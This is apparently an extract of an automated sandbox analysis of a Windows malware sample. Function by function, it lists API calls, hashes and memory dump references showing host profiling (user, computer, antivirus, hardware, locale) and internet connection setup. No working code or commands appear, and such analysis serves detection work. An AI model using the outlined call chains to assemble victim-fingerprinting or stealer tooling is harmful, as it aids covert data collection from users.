                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1859398019-0
                                                                                                                                                                                                                            • Opcode ID: 45a9583896774015c5220384c9ed5eb294c525cf6862c07f2340da09953674c4
                                                                                                                                                                                                                            • Instruction ID: 25c570db86decb207e4e4dfc09e078fb1bce2ee661320ecb4d87a6b80f7b96d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a9583896774015c5220384c9ed5eb294c525cf6862c07f2340da09953674c4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0C87238122477F22412763C6EF6B1A6C9B41F56F205035F309FB2D0D6699804967C
                                                                                                                                                                                                                            Function 00411659 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
                                                                                                                                                                                                                              • Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                            • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                            • Opcode ID: f644913eff35c1bea0ebd6b3338a588dfdbe38cf0212d1c473d842671d84e224
                                                                                                                                                                                                                            • Instruction ID: bbe101daec5a89a31c14a1391deaf042981834e050b350a90ece11c042c44c38
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f644913eff35c1bea0ebd6b3338a588dfdbe38cf0212d1c473d842671d84e224
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E113675A0021CABDB11EB65DC85BDD73B8AB08704F4004AAB645F7191DA78AEC88F5C
                                                                                                                                                                                                                            Function 004110EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041110D
                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041114F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                            • String ID: %d MB
                                                                                                                                                                                                                            • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                            • Opcode ID: 72a52e70201ad22aec00983051af57702ef65c70131e266f08feed65ab004bf9
                                                                                                                                                                                                                            • Instruction ID: b03481c602d06677a198dbb5353ea4b7396302b30250a932e355f2735c5afa91
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72a52e70201ad22aec00983051af57702ef65c70131e266f08feed65ab004bf9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F301AEB1E00318ABEB04DFB4DC45AFEB7B8EF08705F44006AF601D7190DA759D818765
                                                                                                                                                                                                                            Function 0041BC66 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CC33,?,0041CCC1,00000000,06400000,00000003,00000000,004175C1,.exe,00436C64), ref: 0041BCB3
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CC33,?,0041CCC1,00000000,06400000,00000003,00000000), ref: 0041BCEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CreatePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2024441833-0
                                                                                                                                                                                                                            • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                            • Instruction ID: cb5c2f7eaaff30269fafad0aed59c048329575cccc762fe3435784ccc124e2e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D3187B0504B45DFDB349F25A8C47A77AE8EB14318F108B2FF59682640D33898C4CBD9
                                                                                                                                                                                                                            Function 00405237 Relevance: 7.6, APIs: 5, Instructions: 60memorynetworkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$Heap$AllocateConnectCrackOpenProcesslstrcpylstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4264985986-0
                                                                                                                                                                                                                            • Opcode ID: c879fbb2954b69a571fc1074fd32220053ad4d6158a8fd9b701e04bb95142d26
                                                                                                                                                                                                                            • Instruction ID: 7bf317583300bf6ad83df286ffbbc128525ff46f9f5d6ae9615f57ce5c13ed7d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c879fbb2954b69a571fc1074fd32220053ad4d6158a8fd9b701e04bb95142d26
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76114CB1800A2CAFEF20DFA49C84AAB7BBDEB08746F0040A5B908A7150D6355F919F90
                                                                                                                                                                                                                            Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                            • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1274457161-0
                                                                                                                                                                                                                            • Opcode ID: 98310aa1f434478e7fb8539daea0c8874a8af54bde3e2f4e3fe51e91d8b2aa84
                                                                                                                                                                                                                            • Instruction ID: 606110043d28a64a3cf3047e57e5fece759b363c0f9d5b5b09730ac45ad85936
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98310aa1f434478e7fb8539daea0c8874a8af54bde3e2f4e3fe51e91d8b2aa84
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03015B32D00218ABCF049BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A018B94
                                                                                                                                                                                                                            Function 00410F26 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                                                                            • Opcode ID: 267a369b0f9252e087d037b2a4430d55cc5b2cc9540841a28167b2b4da7fd567
                                                                                                                                                                                                                            • Instruction ID: 9d2ba58619f1d31ec1eed97cb1b3f411898d7f1aad353569fe744808fca98e41
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 267a369b0f9252e087d037b2a4430d55cc5b2cc9540841a28167b2b4da7fd567
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F03075640304FFEF248B90DC0EFAA7A7EEB44B06F141155F701A51A0D7B29B509B20
                                                                                                                                                                                                                            Function 004083DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(0065EF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DADF), ref: 004083F7
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(?,00437194,0065EF20,0043674E,?,?,?,?,?,?,?,?,0040DADF), ref: 0040844C
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DADF), ref: 00408460
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                            • String ID: e
                                                                                                                                                                                                                            • API String ID: 2929475105-726562168
                                                                                                                                                                                                                            • Opcode ID: 608c3e56e0bba9b1e90331c1aee2d107131185e51801538c39a848f4d3d46965
                                                                                                                                                                                                                            • Instruction ID: 971f7df55b3f2cb1637261c8732b296e969311353f2cdeab8d65dad1843968ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 608c3e56e0bba9b1e90331c1aee2d107131185e51801538c39a848f4d3d46965
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F316171900714ABCF26EF29ED0246D7BB6AF44706F10613BE440B32B1DB7A1A41CF89
                                                                                                                                                                                                                            Function 00416E08 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00416E0F
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,0000001C), ref: 00416E1A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                            • String ID: ERROR
                                                                                                                                                                                                                            • API String ID: 591506033-2861137601
                                                                                                                                                                                                                            • Opcode ID: 0e0d102a937b243f37c24c7b4619bcd51f608a44afb5604229e917f4cb9f1a7c
                                                                                                                                                                                                                            • Instruction ID: b81a7fc0be90a2729a73b60641f6b777f7ed72233a5555e1ac7bf9a0128b1a2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e0d102a937b243f37c24c7b4619bcd51f608a44afb5604229e917f4cb9f1a7c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE117F31A006099FCB50FF65DA425DDBB71BF04304B90413AE408E3551DB3AEAE48FC8
                                                                                                                                                                                                                            Function 0041221F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00412263
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
